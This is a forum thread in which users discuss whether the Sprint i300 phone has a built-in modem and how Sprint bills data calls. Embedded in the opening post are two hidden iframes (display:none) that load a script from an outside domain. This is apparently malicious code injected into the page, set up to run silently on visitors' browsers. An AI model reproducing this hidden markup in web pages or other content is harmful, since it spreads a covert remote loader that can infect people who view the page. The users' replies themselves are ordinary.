+ Reply to Thread

Thread: Modem

Question Modem

Does the i300 have a built in modem? If it doesnt, then I can see why I would need to pay Sprint to dail into my ISP. If it does have a built in modem, then how can they charge me SprintPCS wireless web minutes?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Dan
    Well, don't take this as gospel but this is what I'm pretty sure is the reason...

Sprint treats data calls differently than voice calls... Even if you use a laptop and call an ISP, you are using "wireless web" minutes according to Sprint. So us I300 users actually have an advantage here: We get to make "normal" internet calls and use whatever software we want but we don't need a separate ISP... we can use Sprint for free.

When I say for free, I mean that you're going to get charged for the "wireless web" minutes as you would on ANY SPCS data-enabled phone. But now you don't need to also pay an ISP for service.

I was under the impression data calls come out of your voice/regular minutes. Doesn't matter if you use Sprint or your regualr dialup ISP to connect to the internet. Any call you make is coming out of your regular monthly allotment of minutes no matter if it is voice or data. However, in order to have any kind of data access on your phone, you need to enable the Sprint "Wireless Web" option on your service plan which is an extra $5/month.

Administrator
    Originally posted by Marty
    I was under the impression data calls come out of your voice/regular minutes. Doesn't matter if you use Sprint or your regualr dialup ISP to connect to the internet. Any call you make is coming out of your regular monthly allotment of minutes no matter if it is voice or data. However, in order to have any kind of data access on your phone, you need to enable the Sprint "Wireless Web" option on your service plan which is an extra $5/month.

..if not, you will be charged .35 censt/minute to use data..

the i300 DOES have an internal modem, and thewy do know the difference between data and voice calls...